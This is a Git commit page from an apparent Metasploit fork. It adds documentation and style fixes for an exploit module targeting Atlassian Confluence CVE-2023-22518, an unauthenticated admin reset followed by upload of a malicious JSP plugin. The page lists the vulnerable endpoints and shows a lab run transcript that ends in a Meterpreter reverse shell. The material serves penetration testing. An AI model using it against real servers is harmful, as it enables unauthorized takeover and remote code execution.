adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Documentation and rubocop changes

Browse Source
This commit is contained in:
Jack Heysel
2023-12-11 19:01:35 -05:00
parent 61414fab27
commit 862194d63f
3 changed files with 121 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md
+108
View File
@@ -0,0 +1,108 @@
## Vulnerable Application
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
### Setup
Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
8.5.1 running on Windows Server 2022.
After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required
to obtain the trial licence. A database and a will also be required to run Confluence. Download and install
[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB
credentials, the default PostgreSQL database can be used.
## Verification Steps
1. Start msfconsole
1. Do: `use atlassian_confluence_unauth_backup`
1. Set the `RHOST`
1. Run the module
1. Receive a Meterpreter session in the context of the user running the Confluence application.
## Options
### CONFLUENCE_TARGET_ENDPOINT
This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows:
- /json/setup-restore.action
- /json/setup-restore-local.action
- /json/setup-restore-progress.action'
### CONFLUENCE_PLUGIN_TIMEOUT
The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
and we must poll the server to find out when installation has completed. This option governs the maximum amount
of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.
## Scenarios
### Windows Server 2022 running Atlassian Confluence 8.5.1
```
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true
verbose => true
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options
Module options (exploit/multi/http/atlassian_confluence_unauth_backup):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin
CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action)
NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges
NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8090 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
[*] Setting credentials: candace.leffler:LELTtnOG
[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG'
[*] Generating payload plugin
[*] Uploading payload plugin
[*] Triggering payload plugin
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 172.16.199.134
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500
meterpreter > getuid
Server username: WIN-2EEL7BRDUD8$
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows Server 2022 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
```
lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb
+1 -1
View File
@@ -123,7 +123,7 @@ module Msf::Exploit::Remote::HTTP::Atlassian::Confluence::PayloadPlugin
end
def delete_payload_plugin(plugin_key, payload_endpoint, admin_username, admin_password)
print_status('Deleting plugin...')
vprint_status('Deleting plugin...')
res = send_request_cgi(
'method' => 'DELETE',
modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb
+12 -12
View File
@@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
super(
update_info(
info,
'Name' => 'Atlassian Confluence Unauth JSON setup-restore RCE',
'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)',
'Description' => %q{
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
},
'Author' => [
'Atlassian', # Discovery
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
# The endpoint we target to trigger the vulnerability.
OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action','/json/setup-restore-local.action','/json/setup-restore-progress.action']]),
OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]),
# We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
]
@@ -70,9 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Confluence Serer and Confluence Data Center have the same vulnerable version ranges.
if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) ||
confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) ||
confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) ||
confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2'))
return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
end
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'keep_cookies' => true,
'headers' => {
'X-Atlassian-Token' => 'no-check',
'X-Atlassian-Token' => 'no-check'
},
'vars_get' => {
'synchronous' => 'true'
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password
upload_backup
# Now with admin access, upload a .jsp plugin to gain RCE on the target system.
# Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system.
payload_endpoint = rand_text_alphanumeric(8)
plugin_key = rand_text_alpha(8)
begin